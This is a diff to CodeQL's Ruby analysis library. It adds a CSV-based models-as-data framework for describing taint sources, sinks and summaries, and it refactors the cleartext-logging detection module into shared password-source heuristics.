-  class RegexpEscapeSummary extends SummarizedCallable {
-    RegexpEscapeSummary() { this = "Regexp.escape" }
-
-    override MethodCall getACall() {
-      result =
-        API::getTopLevelMember("Regexp").getAMethodCall(["escape", "quote"]).asExpr().getExpr()
-    }
-
-    override predicate propagatesFlowExt(string input, string output, boolean preservesValue) {
-      input = "Argument[0]" and
-      output = "ReturnValue" and
-      preservesValue = false
+  class RegexpEscapeSummary extends ModelInput::SummaryModelCsv {
+    override predicate row(string row) {
+      row = ";;Member[Regexp].Method[escape,quote];Argument[0];ReturnValue;taint"
    }
  }
 }
--- a/ruby/ql/lib/codeql/ruby/frameworks/data/ModelsAsData.qll
+++ b/ruby/ql/lib/codeql/ruby/frameworks/data/ModelsAsData.qll
@@ -0,0 +1,31 @@
+/**
+ * Provides classes for contributing a model, or using the interpreted results
+ * of a model represented as data.
+ *
+ * - Use the `ModelInput` module to contribute new models.
+ * - Use the `ModelOutput` module to access the model results in terms of API nodes.
+ *
+ * The `package` part of a CSV row should be the name of a Ruby gem, or the empty
+ * string if it's referring to the standard library.
+ *
+ * The `type` part can be one of the following:
+ *   - the empty string, referring to the global scope,
+ *   - the string `any`, referring to any expression, or
+ *   - the name of a type definition from `ModelInput::TypeModelCsv`
+ */
+
+private import ruby
+private import internal.ApiGraphModels as Shared
+private import internal.ApiGraphModelsSpecific as Specific
+import Shared::ModelInput as ModelInput
+import Shared::ModelOutput as ModelOutput
+private import codeql.ruby.dataflow.RemoteFlowSources
+
+/**
+ * A remote flow source originating from a CSV source row.
+ */
+private class RemoteFlowSourceFromCsv extends RemoteFlowSource::Range {
+  RemoteFlowSourceFromCsv() { this = ModelOutput::getASourceNode("remote").getAnImmediateUse() }
+
+  override string getSourceType() { result = "Remote flow (from model)" }
+}
--- a/ruby/ql/lib/codeql/ruby/frameworks/data/internal/ApiGraphModels.qll
+++ b/ruby/ql/lib/codeql/ruby/frameworks/data/internal/ApiGraphModels.qll
@@ -0,0 +1,522 @@
+/**
+ * INTERNAL use only. This is an experimental API subject to change without notice.
+ *
+ * Provides classes and predicates for dealing with flow models specified in CSV format.
+ *
+ * The CSV specification has the following columns:
+ * - Sources:
+ *   `package; type; path; kind`
+ * - Sinks:
+ *   `package; type; path; kind`
+ * - Summaries:
+ *   `package; type; path; input; output; kind`
+ * - Types:
+ *   `package1; type1; package2; type2; path`
+ *
+ * The interpretation of a row is similar to API-graphs with a left-to-right
+ * reading.
+ * 1. The `package` column selects a package name, as it would be referenced in the source code,
+ *    such as an NPM package, PIP package, or Ruby gem. (See `ModelsAsData.qll` for language-specific details).
+ *    It may also be a synthetic package used for a type definition (see type definitions below).
+ * 2. The `type` column selects all instances of a named type originating from that package,
+ *    or the empty string if referring to the package itself.
+ *    It can also be a synthetic type name defined by a type definition (see type definitions below).
+ * 3. The `path` column is a `.`-separated list of "access path tokens" to resolve, starting at the node selected by `package` and `type`.
+ *
+ *    Every language supports the following tokens:
+ *     - Argument[n]: the n-th argument to a call. May be a range of form `x..y` (inclusive) and/or a comma-separated list.
+ *                    Additionally, `N-1` refers to the last argument, `N-2` refers to the second-last, and so on.
+ *     - Parameter[n]: the n-th parameter of a callback. May be a range of form `x..y` (inclusive) and/or a comma-separated list.
+ *     - ReturnValue: the value returned by a function call
+ *     - WithArity[n]: match a call with the given arity. May be a range of form `x..y` (inclusive) and/or a comma-separated list.
+ *
+ *    The following tokens are common and should be implemented for languages where it makes sense:
+ *     - Member[x]: a member named `x`; exactly what a "member" is depends on the language. May be a comma-separated list of names.
+ *     - Instance: an instance of a class
+ *     - Subclass: a subclass of a class
+ *     - ArrayElement: an element of array
+ *     - Element: an element of a collection-like object
+ *     - MapKey: a key in map-like object
+ *     - MapValue: a value in a map-like object
+ *     - Awaited: the value from a resolved promise/future-like object
+ *
+ *    For the time being, please consult `ApiGraphModelsSpecific.qll` to see which language-specific tokens are currently supported.
+ *
+ * 4. The `input` and `output` columns specify how data enters and leaves the element selected by the
+ *    first `(package, type, path)` tuple. Both strings are `.`-separated access paths
+ *    of the same syntax as the `path` column.
+ * 5. The `kind` column is a tag that can be referenced from QL to determine to
+ *    which classes the interpreted elements should be added. For example, for
+ *    sources `"remote"` indicates a default remote flow source, and for summaries
+ *    `"taint"` indicates a default additional taint step and `"value"` indicates a
+ *    globally applicable value-preserving step.
+ *
+ * ### Types
+ *
+ * A type row of form `package1; type1; package2; type2; path` indicates that `package2; type2; path`
+ * should be seen as an instance of the type `package1; type1`.
+ *
+ * A `(package,type)` pair may refer to a static type or a synthetic type name used internally in the model.
+ * Synthetic type names can be used to reuse intermediate sub-paths, when there are multiple ways to access the same
+ * element.
+ * See `ModelsAsData.qll` for the langauge-specific interpretation of packages and static type names.
+ *
+ * By convention, if one wants to avoid clashes with static types from the package, the type name
+ * should be prefixed with a tilde character (`~`). For example, `(foo, ~Bar)` can be used to indicate that
+ * the type is related to the `foo` package but is not intended to match a static type.
+ */
+
+private import ApiGraphModelsSpecific as Specific
+
+private class Unit = Specific::Unit;
+
+private module API = Specific::API;
+
+private import Specific::AccessPathSyntax
+
+/** Module containing hooks for providing input data to be interpreted as a model. */
+module ModelInput {
+  /**
+   * A unit class for adding additional source model rows.
+   *
+   * Extend this class to add additional source definitions.
+   */
+  class SourceModelCsv extends Unit {
+    /**
+     * Holds if `row` specifies a source definition.
+     *
+     * A row of form
+     * ```
+     * package;type;path;kind
+     * ```
+     * indicates that the value at `(package, type, path)` should be seen as a flow
+     * source of the given `kind`.
+     *
+     * The kind `remote` represents a general remote flow source.
+     */
+    abstract predicate row(string row);
+  }
+
+  /**
+   * A unit class for adding additional sink model rows.
+   *
+   * Extend this class to add additional sink definitions.
+   */
+  class SinkModelCsv extends Unit {
+    /**
+     * Holds if `row` specifies a sink definition.
+     *
+     * A row of form
+     * ```
+     * package;type;path;kind
+     * ```
+     * indicates that the value at `(package, type, path)` should be seen as a sink
+     * of the given `kind`.
+     */
+    abstract predicate row(string row);
+  }
+
+  /**
+   * A unit class for adding additional summary model rows.
+   *
+   * Extend this class to add additional flow summary definitions.
+   */
+  class SummaryModelCsv extends Unit {
+    /**
+     * Holds if `row` specifies a summary definition.
+     *
+     * A row of form
+     * ```
+     * package;type;path;input;output;kind
+     * ```
+     * indicates that for each call to `(package, type, path)`, the value referred to by `input`
+     * can flow to the value referred to by `output`.
+     *
+     * `kind` should be either `value` or `taint`, for value-preserving or taint-preserving steps,
+     * respectively.
+     */
+    abstract predicate row(string row);
+  }
+
+  /**
+   * A unit class for adding additional type model rows.
+   *
+   * Extend this class to add additional type definitions.
+   */
+  class TypeModelCsv extends Unit {
+    /**
+     * Holds if `row` specifies a type definition.
+     *
+     * A row of form,
+     * ```
+     * package1;type1;package2;type2;path
+     * ```
+     * indicates that `(package2, type2, path)` should be seen as an instance of `(package1, type1)`.
+     */
+    abstract predicate row(string row);
+  }
+}
+
+private import ModelInput
+
+/**
+ * An empty class, except in specific tests.
+ *
+ * If this is non-empty, all models are parsed even if the package is not
+ * considered relevant for the current database.
+ */
+abstract class TestAllModels extends Unit { }
+
+/**
+ * Append `;dummy` to the value of `s` to work around the fact that `string.split(delim,n)`
+ * does not preserve empty trailing substrings.
+ */
+bindingset[result]
+private string inversePad(string s) { s = result + ";dummy" }
+
+private predicate sourceModel(string row) { any(SourceModelCsv s).row(inversePad(row)) }
+
+private predicate sinkModel(string row) { any(SinkModelCsv s).row(inversePad(row)) }
+
+private predicate summaryModel(string row) { any(SummaryModelCsv s).row(inversePad(row)) }
+
+private predicate typeModel(string row) { any(TypeModelCsv s).row(inversePad(row)) }
+
+/** Holds if a source model exists for the given parameters. */
+predicate sourceModel(string package, string type, string path, string kind) {
+  exists(string row |
+    sourceModel(row) and
+    row.splitAt(";", 0) = package and
+    row.splitAt(";", 1) = type and
+    row.splitAt(";", 2) = path and
+    row.splitAt(";", 3) = kind
+  )
+}
+
+/** Holds if a sink model exists for the given parameters. */
+private predicate sinkModel(string package, string type, string path, string kind) {
+  exists(string row |
+    sinkModel(row) and
+    row.splitAt(";", 0) = package and
+    row.splitAt(";", 1) = type and
+    row.splitAt(";", 2) = path and
+    row.splitAt(";", 3) = kind
+  )
+}
+
+/** Holds if a summary model `row` exists for the given parameters. */
+private predicate summaryModel(
+  string package, string type, string path, string input, string output, string kind
+) {
+  exists(string row |
+    summaryModel(row) and
+    row.splitAt(";", 0) = package and
+    row.splitAt(";", 1) = type and
+    row.splitAt(";", 2) = path and
+    row.splitAt(";", 3) = input and
+    row.splitAt(";", 4) = output and
+    row.splitAt(";", 5) = kind
+  )
+}
+
+/** Holds if an type model exists for the given parameters. */
+private predicate typeModel(
+  string package1, string type1, string package2, string type2, string path
+) {
+  exists(string row |
+    typeModel(row) and
+    row.splitAt(";", 0) = package1 and
+    row.splitAt(";", 1) = type1 and
+    row.splitAt(";", 2) = package2 and
+    row.splitAt(";", 3) = type2 and
+    row.splitAt(";", 4) = path
+  )
+}
+
+/**
+ * Gets a package that should be seen as an alias for the given other `package`,
+ * or the `package` itself.
+ */
+bindingset[package]
+bindingset[result]
+string getAPackageAlias(string package) {
+  typeModel(package, "", result, "", "")
+  or
+  result = package
+}
+
+/**
+ * Holds if CSV rows involving `package` might be relevant for the analysis of this database.
+ */
+private predicate isRelevantPackage(string package) {
+  (
+    sourceModel(package, _, _, _) or
+    sinkModel(package, _, _, _) or
+    summaryModel(package, _, _, _, _, _) or
+    typeModel(package, _, _, _, _)
+  ) and
+  (
+    Specific::isPackageUsed(package)
+    or
+    exists(TestAllModels t)
+  )
+  or
+  exists(string other |
+    isRelevantPackage(other) and
+    typeModel(package, _, other, _, _)
+  )
+}
+
+/**
+ * Holds if `package,type,path` is used in some CSV row.
+ */
+pragma[nomagic]
+predicate isRelevantFullPath(string package, string type, string path) {
+  isRelevantPackage(package) and
+  (
+    sourceModel(package, type, path, _) or
+    sinkModel(package, type, path, _) or
+    summaryModel(package, type, path, _, _, _) or
+    typeModel(_, _, package, type, path)
+  )
+}
+
+/** A string from a CSV row that should be parsed as an access path. */
+private class AccessPathRange extends AccessPath::Range {
+  AccessPathRange() {
+    isRelevantFullPath(_, _, this)
+    or
+    exists(string package | isRelevantPackage(package) |
+      summaryModel(package, _, _, this, _, _) or
+      summaryModel(package, _, _, _, this, _)
+    )
+  }
+}
+
+/**
+ * Gets a successor of `node` in the API graph.
+ */
+bindingset[token]
+API::Node getSuccessorFromNode(API::Node node, AccessPathToken token) {
+  // API graphs use the same label for arguments and parameters. An edge originating from a
+  // use-node represents be an argument, and an edge originating from a def-node represents a parameter.
+  // We just map both to the same thing.
+  token.getName() = ["Argument", "Parameter"] and
+  result = node.getParameter(AccessPath::parseIntUnbounded(token.getAnArgument()))
+  or
+  token.getName() = "ReturnValue" and
+  result = node.getReturn()
+  or
+  // Language-specific tokens
+  result = Specific::getExtraSuccessorFromNode(node, token)
+}
+
+/**
+ * Gets an API-graph successor for the given invocation.
+ */
+bindingset[token]
+API::Node getSuccessorFromInvoke(Specific::InvokeNode invoke, AccessPathToken token) {
+  token.getName() = "Argument" and
+  result =
+    invoke
+        .getParameter(AccessPath::parseIntWithArity(token.getAnArgument(), invoke.getNumArgument()))
+  or
+  token.getName() = "ReturnValue" and
+  result = invoke.getReturn()
+  or
+  // Language-specific tokens
+  result = Specific::getExtraSuccessorFromInvoke(invoke, token)
+}
+
+/**
+ * Holds if `invoke` invokes a call-site filter given by `token`.
+ */
+pragma[inline]
+private predicate invocationMatchesCallSiteFilter(Specific::InvokeNode invoke, AccessPathToken token) {
+  token.getName() = "WithArity" and
+  invoke.getNumArgument() = AccessPath::parseIntUnbounded(token.getAnArgument())
+  or
+  Specific::invocationMatchesExtraCallSiteFilter(invoke, token)
+}
+
+/**
+ * Gets the API node identified by the first `n` tokens of `path` in the given `(package, type, path)` tuple.
+ */
+pragma[nomagic]
+private API::Node getNodeFromPath(string package, string type, AccessPath path, int n) {
+  isRelevantFullPath(package, type, path) and
+  (
+    n = 0 and
+    exists(string package2, string type2, AccessPath path2 |
+      typeModel(package, type, package2, type2, path2) and
+      result = getNodeFromPath(package2, type2, path2, path2.getNumToken())
+    )
+    or
+    // Language-specific cases, such as handling of global variables
+    result = Specific::getExtraNodeFromPath(package, type, path, n)
+  )
+  or
+  result = getSuccessorFromNode(getNodeFromPath(package, type, path, n - 1), path.getToken(n - 1))
+  or
+  // Similar to the other recursive case, but where the path may have stepped through one or more call-site filters
+  result =
+    getSuccessorFromInvoke(getInvocationFromPath(package, type, path, n - 1), path.getToken(n - 1))
+}
+
+/** Gets the node identified by the given `(package, type, path)` tuple. */
+API::Node getNodeFromPath(string package, string type, AccessPath path) {
+  result = getNodeFromPath(package, type, path, path.getNumToken())
+}
+
+/**
+ * Gets an invocation identified by the given `(package, type, path)` tuple.
+ *
+ * Unlike `getNodeFromPath`, the `path` may end with one or more call-site filters.
+ */
+Specific::InvokeNode getInvocationFromPath(string package, string type, AccessPath path, int n) {
+  result = Specific::getAnInvocationOf(getNodeFromPath(package, type, path, n))
+  or
+  result = getInvocationFromPath(package, type, path, n - 1) and
+  invocationMatchesCallSiteFilter(result, path.getToken(n - 1))
+}
+
+/** Gets an invocation identified by the given `(package, type, path)` tuple. */
+Specific::InvokeNode getInvocationFromPath(string package, string type, AccessPath path) {
+  result = getInvocationFromPath(package, type, path, path.getNumToken())
+}
+
+/**
+ * Holds if `name` is a valid name for an access path token in the identifying access path.
+ */
+bindingset[name]
+predicate isValidTokenNameInIdentifyingAccessPath(string name) {
+  name = ["Argument", "Parameter", "ReturnValue", "WithArity"]
+  or
+  Specific::isExtraValidTokenNameInIdentifyingAccessPath(name)
+}
+
+/**
+ * Holds if `name` is a valid name for an access path token with no arguments, occuring
+ * in an identifying access path.
+ */
+bindingset[name]
+predicate isValidNoArgumentTokenInIdentifyingAccessPath(string name) {
+  name = "ReturnValue"
+  or
+  Specific::isExtraValidNoArgumentTokenInIdentifyingAccessPath(name)
+}
+
+/**
+ * Holds if `argument` is a valid argument to an access path token with the given `name`, occurring
+ * in an identifying access path.
+ */
+bindingset[name, argument]
+predicate isValidTokenArgumentInIdentifyingAccessPath(string name, string argument) {
+  name = ["Argument", "Parameter"] and
+  argument.regexpMatch("(N-|-)?\\d+(\\.\\.(N-|-)?\\d+)?")
+  or
+  name = "WithArity" and
+  argument.regexpMatch("\\d+(\\.\\.\\d+)?")
+  or
+  Specific::isExtraValidTokenArgumentInIdentifyingAccessPath(name, argument)
+}
+
+/**
+ * Module providing access to the imported models in terms of API graph nodes.
+ */
+module ModelOutput {
+  /**
+   * Holds if a CSV source model contributed `source` with the given `kind`.
+   */
+  API::Node getASourceNode(string kind) {
+    exists(string package, string type, string path |
+      sourceModel(package, type, path, kind) and
+      result = getNodeFromPath(package, type, path)
+    )
+  }
+
+  /**
+   * Holds if a CSV sink model contributed `sink` with the given `kind`.
+   */
+  API::Node getASinkNode(string kind) {
+    exists(string package, string type, string path |
+      sinkModel(package, type, path, kind) and
+      result = getNodeFromPath(package, type, path)
+    )
+  }
+
+  /**
+   * Holds if a relevant CSV summary exists for these parameters.
+   */
+  predicate relevantSummaryModel(
+    string package, string type, string path, string input, string output, string kind
+  ) {
+    isRelevantPackage(package) and
+    summaryModel(package, type, path, input, output, kind)
+  }
+
+  /**
+   * Holds if a `baseNode` is an invocation identified by the `package,type,path` part of a summary row.
+   */
+  predicate resolvedSummaryBase(
+    string package, string type, string path, Specific::InvokeNode baseNode
+  ) {
+    summaryModel(package, type, path, _, _, _) and
+    baseNode = getInvocationFromPath(package, type, path)
+  }
+
+  /**
+   * Holds if `node` is seen as an instance of `(package,type)` due to a type definition
+   * contributed by a CSV model.
+   */
+  API::Node getATypeNode(string package, string type) {
+    exists(string package2, string type2, AccessPath path |
+      typeModel(package, type, package2, type2, path) and
+      result = getNodeFromPath(package2, type2, path)
+    )
+  }
+
+  /**
+   * Gets an error message relating to an invalid CSV row in a model.
+   */
+  string getAWarning() {
+    // Check number of columns
+    exists(string row, string kind, int expectedArity, int actualArity |
+      any(SourceModelCsv csv).row(row) and kind = "source" and expectedArity = 4
+      or
+      any(SinkModelCsv csv).row(row) and kind = "sink" and expectedArity = 4
+      or
+      any(SummaryModelCsv csv).row(row) and kind = "summary" and expectedArity = 6
+      or
+      any(TypeModelCsv csv).row(row) and kind = "type" and expectedArity = 5
+    |
+      actualArity = count(row.indexOf(";")) + 1 and
+      actualArity != expectedArity and
+      result =
+        "CSV " + kind + " row should have " + expectedArity + " columns but has " + actualArity +
+          ": " + row
+    )
+    or
+    // Check names and arguments of access path tokens
+    exists(AccessPath path, AccessPathToken token |
+      isRelevantFullPath(_, _, path) and
+      token = path.getToken(_)
+    |
+      not isValidTokenNameInIdentifyingAccessPath(token.getName()) and
+      result = "Invalid token name '" + token.getName() + "' in access path: " + path
+      or
+      isValidTokenNameInIdentifyingAccessPath(token.getName()) and
+      exists(string argument |
+        argument = token.getAnArgument() and
+        not isValidTokenArgumentInIdentifyingAccessPath(token.getName(), argument) and
+        result =
+          "Invalid argument '" + argument + "' in token '" + token + "' in access path: " + path
+      )
+      or
+      isValidTokenNameInIdentifyingAccessPath(token.getName()) and
+      token.getNumArgument() = 0 and
+      not isValidNoArgumentTokenInIdentifyingAccessPath(token.getName()) and
+      result = "Invalid token '" + token + "' is missing its arguments, in access path: " + path
+    )
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/frameworks/data/internal/ApiGraphModelsSpecific.qll
+++ b/ruby/ql/lib/codeql/ruby/frameworks/data/internal/ApiGraphModelsSpecific.qll
@@ -0,0 +1,168 @@
+/**
+ * Contains the language-specific part of the models-as-data implementation found in `ApiGraphModels.qll`.
+ *
+ * It must export the following members:
+ * ```ql
+ * class Unit // a unit type
+ * class InvokeNode // a type representing an invocation connected to the API graph
+ * module API // the API graph module
+ * predicate isPackageUsed(string package)
+ * API::Node getExtraNodeFromPath(string package, string type, string path, int n)
+ * API::Node getExtraSuccessorFromNode(API::Node node, AccessPathToken token)
+ * API::Node getExtraSuccessorFromInvoke(InvokeNode node, AccessPathToken token)
+ * predicate invocationMatchesExtraCallSiteFilter(InvokeNode invoke, AccessPathToken token)
+ * InvokeNode getAnInvocationOf(API::Node node)
+ * ```
+ */
+
+private import ruby
+private import codeql.ruby.DataFlow
+private import codeql.ruby.dataflow.internal.DataFlowPrivate as DataFlowPrivate
+private import ApiGraphModels
+
+class Unit = DataFlowPrivate::Unit;
+
+// Re-export libraries needed by ApiGraphModels.qll
+import codeql.ruby.ApiGraphs
+import codeql.ruby.dataflow.internal.AccessPathSyntax as AccessPathSyntax
+private import AccessPathSyntax
+
+/**
+ * Holds if models describing `package` may be relevant for the analysis of this database.
+ *
+ * In the context of Ruby, this is the name of a Ruby gem.
+ */
+bindingset[package]
+predicate isPackageUsed(string package) {
+  // For now everything is modelled as an access path starting at any top-level, so the package name has no effect.
+  //
+  // We allow an arbitrary package name so that the model can record the name of the package in case it's needed in the future.
+  //
+  // In principle we should consider a package to be "used" if there is a transitive dependency on it, but we can only
+  // reliably see the direct dependencies.
+  //
+  // In practice, packages try to use unique top-level module names, which mitigates the precision loss of not checking
+  // the package name.
+  any()
+}
+
+/** Gets a Ruby-specific interpretation of the `(package, type, path)` tuple after resolving the first `n` access path tokens. */
+bindingset[package, type, path]
+API::Node getExtraNodeFromPath(string package, string type, AccessPath path, int n) {
+  isRelevantFullPath(package, type, path) and
+  exists(package) and // Allow any package name, see `isPackageUsed`.
+  type = "" and
+  n = 0 and
+  result = API::root()
+  or
+  // A row of form `;any;Method[foo]` should match any method named `foo`.
+  exists(package) and
+  type = "any" and
+  n = 1 and
+  exists(EntryPointFromAnyType entry |
+    methodMatchedByName(path, entry.getName()) and
+    result = entry.getANode()
+  )
+}
+
+/**
+ * Holds if `path` occurs in a CSV row with type `any`, meaning it can start
+ * matching anywhere, and the path begins with `Method[methodName]`.
+ */
+private predicate methodMatchedByName(AccessPath path, string methodName) {
+  isRelevantFullPath(_, "any", path) and
+  exists(AccessPathToken token |
+    token = path.getToken(0) and
+    token.getName() = "Method" and
+    methodName = token.getAnArgument()
+  )
+}
+
+/**
+ * An API graph entry point corresponding to a method name such as `foo` in `;any;Method[foo]`.
+ *
+ * This ensures that the API graph rooted in that method call is materialized.
+ */
+private class EntryPointFromAnyType extends API::EntryPoint {
+  string name;
+
+  EntryPointFromAnyType() { this = "AnyMethod[" + name + "]" and methodMatchedByName(_, name) }
+
+  override DataFlow::CallNode getACall() { result.getMethodName() = name }
+
+  string getName() { result = name }
+}
+
+/**
+ * Gets a Ruby-specific API graph successor of `node` reachable by resolving `token`.
+ */
+bindingset[token]
+API::Node getExtraSuccessorFromNode(API::Node node, AccessPathToken token) {
+  token.getName() = "Member" and
+  result = node.getMember(token.getAnArgument())
+  or
+  token.getName() = "Method" and
+  result = node.getMethod(token.getAnArgument())
+  or
+  token.getName() = "Instance" and
+  result = node.getInstance()
+  or
+  token.getName() = "BlockArgument" and
+  result = node.getBlock()
+  // Note: The "ArrayElement" token is not implemented yet, as it ultimately requires type-tracking and
+  // API graphs to be aware of the steps involving ArrayElement contributed by the standard library model.
+  // Type-tracking cannot summarize function calls on its own, so it doesn't benefit from synthesized callables.
+}
+
+/**
+ * Gets a Ruby-specific API graph successor of `node` reachable by resolving `token`.
+ */
+bindingset[token]
+API::Node getExtraSuccessorFromInvoke(InvokeNode node, AccessPathToken token) { none() }
+
+/**
+ * Holds if `invoke` matches the Ruby-specific call site filter in `token`.
+ */
+bindingset[token]
+predicate invocationMatchesExtraCallSiteFilter(InvokeNode invoke, AccessPathToken token) {
+  token.getName() = "WithBlock" and
+  exists(invoke.getBlock())
+  or
+  token.getName() = "WithoutBlock" and
+  not exists(invoke.getBlock())
+}
+
+/** An API graph node representing a method call. */
+class InvokeNode extends API::MethodAccessNode {
+  /** Gets the number of arguments to the call. */
+  int getNumArgument() { result = getCallNode().getNumberOfArguments() }
+}
+
+/** Gets the `InvokeNode` corresponding to a specific invocation of `node`. */
+InvokeNode getAnInvocationOf(API::Node node) { result = node }
+
+/**
+ * Holds if `name` is a valid name for an access path token in the identifying access path.
+ */
+bindingset[name]
+predicate isExtraValidTokenNameInIdentifyingAccessPath(string name) {
+  name = ["Member", "Method", "Instance", "WithBlock", "WithoutBlock", "BlockArgument"]
+}
+
+/**
+ * Holds if `name` is a valid name for an access path token with no arguments, occuring
+ * in an identifying access path.
+ */
+predicate isExtraValidNoArgumentTokenInIdentifyingAccessPath(string name) {
+  name = ["Instance", "WithBlock", "WithoutBlock", "BlockArgument"]
+}
+
+/**
+ * Holds if `argument` is a valid argument to an access path token with the given `name`, occurring
+ * in an identifying access path.
+ */
+bindingset[name, argument]
+predicate isExtraValidTokenArgumentInIdentifyingAccessPath(string name, string argument) {
+  name = ["Member", "Method"] and
+  exists(argument)
+}
--- a/ruby/ql/lib/codeql/ruby/security/CleartextLoggingCustomizations.qll
+++ b/ruby/ql/lib/codeql/ruby/security/CleartextLoggingCustomizations.qll
@@ -6,12 +6,8 @@

 private import ruby
 private import codeql.ruby.DataFlow
-private import codeql.ruby.TaintTracking::TaintTracking
 private import codeql.ruby.Concepts
-private import codeql.ruby.dataflow.RemoteFlowSources
-private import internal.SensitiveDataHeuristics::HeuristicNames
-private import codeql.ruby.CFG
-private import codeql.ruby.dataflow.SSA
+private import internal.CleartextSources

 /**
 * Provides default sources, sinks and sanitizers for reasoning about
@@ -22,265 +18,25 @@ module CleartextLogging {
  /**
   * A data flow source for cleartext logging of sensitive information.
   */
-  abstract class Source extends DataFlow::Node {
-    /** Gets a string that describes the type of this data flow source. */
-    abstract string describe();
-  }
+  class Source = CleartextSources::Source;
+
+  /**
+   * A sanitizer for cleartext logging of sensitive information.
+   */
+  class Sanitizer = CleartextSources::Sanitizer;
+
+  /** Holds if `nodeFrom` taints `nodeTo`. */
+  predicate isAdditionalTaintStep = CleartextSources::isAdditionalTaintStep/2;

  /**
   * A data flow sink for cleartext logging of sensitive information.
   */
  abstract class Sink extends DataFlow::Node { }

-  /**
-   * A sanitizer for cleartext logging of sensitive information.
-   */
-  abstract class Sanitizer extends DataFlow::Node { }
-
-  /**
-   * Holds if `re` may be a regular expression that can be used to sanitize
-   * sensitive data with a call to `sub`.
-   */
-  private predicate effectiveSubRegExp(CfgNodes::ExprNodes::RegExpLiteralCfgNode re) {
-    re.getConstantValue().getStringOrSymbol().matches([".*", ".+"])
-  }
-
-  /**
-   * Holds if `re` may be a regular expression that can be used to sanitize
-   * sensitive data with a call to `gsub`.
-   */
-  private predicate effectiveGsubRegExp(CfgNodes::ExprNodes::RegExpLiteralCfgNode re) {
-    re.getConstantValue().getStringOrSymbol().matches(".")
-  }
-
-  /**
-   * A call to `sub`/`sub!` or `gsub`/`gsub!` that seems to mask sensitive information.
-   */
-  private class MaskingReplacerSanitizer extends Sanitizer, DataFlow::CallNode {
-    MaskingReplacerSanitizer() {
-      exists(CfgNodes::ExprNodes::RegExpLiteralCfgNode re |
-        re = this.getArgument(0).asExpr() and
-        (
-          this.getMethodName() = ["sub", "sub!"] and effectiveSubRegExp(re)
-          or
-          this.getMethodName() = ["gsub", "gsub!"] and effectiveGsubRegExp(re)
-        )
-      )
-    }
-  }
-
-  /**
-   * Like `MaskingReplacerSanitizer` but updates the receiver for methods that
-   * sanitize the receiver.
-   * Taint is thereby cleared for any subsequent read.
-   */
-  private class InPlaceMaskingReplacerSanitizer extends Sanitizer {
-    InPlaceMaskingReplacerSanitizer() {
-      exists(MaskingReplacerSanitizer m | m.getMethodName() = ["gsub!", "sub!"] |
-        m.getReceiver() = this
-      )
-    }
-  }
-
-  /**
-   * Holds if `name` is for a method or variable that appears, syntactically, to
-   * not be sensitive.
-   */
-  bindingset[name]
-  private predicate nameIsNotSensitive(string name) {
-    name.regexpMatch(notSensitiveRegexp()) and
-    // By default `notSensitiveRegexp()` includes some false positives for
-    // common ruby method names that are not necessarily non-sensitive.
-    // We explicitly exclude element references, element assignments, and
-    // mutation methods.
-    not name = ["[]", "[]="] and
-    not name.matches("%!")
-  }
-
-  /**
-   * A call that might obfuscate a password, for example through hashing.
-   */
-  private class ObfuscatorCall extends Sanitizer, DataFlow::CallNode {
-    ObfuscatorCall() { nameIsNotSensitive(this.getMethodName()) }
-  }
-
-  /**
-   * A data flow node that does not contain a clear-text password, according to its syntactic name.
-   */
-  private class NameGuidedNonCleartextPassword extends NonCleartextPassword {
-    NameGuidedNonCleartextPassword() {
-      exists(string name | nameIsNotSensitive(name) |
-        // accessing a non-sensitive variable
-        this.asExpr().getExpr().(VariableReadAccess).getVariable().getName() = name
-        or
-        // dereferencing a non-sensitive field
-        this.asExpr()
-            .(CfgNodes::ExprNodes::ElementReferenceCfgNode)
-            .getArgument(0)
-            .getConstantValue()
-            .getStringOrSymbol() = name
-        or
-        // calling a non-sensitive method
-        this.(DataFlow::CallNode).getMethodName() = name
-      )
-      or
-      // avoid i18n strings
-      this.asExpr()
-          .(CfgNodes::ExprNodes::ElementReferenceCfgNode)
-          .getReceiver()
-          .getConstantValue()
-          .getStringOrSymbol()
-          .regexpMatch("(?is).*(messages|strings).*")
-    }
-  }
-
-  /**
-   * A data flow node that receives flow that is not a clear-text password.
-   */
-  private class NonCleartextPasswordFlow extends NonCleartextPassword {
-    NonCleartextPasswordFlow() {
-      any(NonCleartextPassword other).(DataFlow::LocalSourceNode).flowsTo(this)
-    }
-  }
-
-  /**
-   * A data flow node that does not contain a clear-text password.
-   */
-  abstract private class NonCleartextPassword extends DataFlow::Node { }
-
-  // `writeNode` assigns pair with key `name` to `val`
-  private predicate hashKeyWrite(DataFlow::CallNode writeNode, string name, DataFlow::Node val) {
-    writeNode.asExpr().getExpr() instanceof SetterMethodCall and
-    // hash[name]
-    writeNode.getArgument(0).asExpr().getConstantValue().getStringOrSymbol() = name and
-    // val
-    writeNode.getArgument(1).asExpr().(CfgNodes::ExprNodes::AssignExprCfgNode).getRhs() =
-      val.asExpr()
-  }
-
-  /**
-   * A write to a hash entry with a value that may contain password information.
-   */
-  private class HashKeyWritePasswordSource extends Source {
-    private string name;
-    private DataFlow::ExprNode recv;
-
-    HashKeyWritePasswordSource() {
-      exists(DataFlow::Node val |
-        name.regexpMatch(maybePassword()) and
-        not nameIsNotSensitive(name) and
-        // avoid safe values assigned to presumably unsafe names
-        not val instanceof NonCleartextPassword and
-        (
-          // hash[name] = val
-          hashKeyWrite(this, name, val) and
-          recv = this.(DataFlow::CallNode).getReceiver()
-        )
-      )
-    }
-
-    override string describe() { result = "a write to " + name }
-
-    /** Gets the name of the key */
-    string getName() { result = name }
-
-    /**
-     * Gets the name of the hash variable that this password source is assigned
-     * to, if applicable.
-     */
-    LocalVariable getVariable() {
-      result = recv.getExprNode().getExpr().(VariableReadAccess).getVariable()
-    }
-  }
-
-  /**
-   * A hash literal with an entry that may contain a password
-   */
-  private class HashLiteralPasswordSource extends Source {
-    private string name;
-
-    HashLiteralPasswordSource() {
-      exists(DataFlow::Node val, CfgNodes::ExprNodes::HashLiteralCfgNode lit |
-        name.regexpMatch(maybePassword()) and
-        not name.regexpMatch(notSensitiveRegexp()) and
-        // avoid safe values assigned to presumably unsafe names
-        not val instanceof NonCleartextPassword and
-        // hash = { name: val }
-        exists(CfgNodes::ExprNodes::PairCfgNode p |
-          this.asExpr() = lit and p = lit.getAKeyValuePair()
-        |
-          p.getKey().getConstantValue().getStringOrSymbol() = name and
-          p.getValue() = val.asExpr()
-        )
-      )
-    }
-
-    override string describe() { result = "an write to " + name }
-  }
-
-  /** An assignment that may assign a password to a variable */
-  private class AssignPasswordVariableSource extends Source {
-    string name;
-
-    AssignPasswordVariableSource() {
-      // avoid safe values assigned to presumably unsafe names
-      not this instanceof NonCleartextPassword and
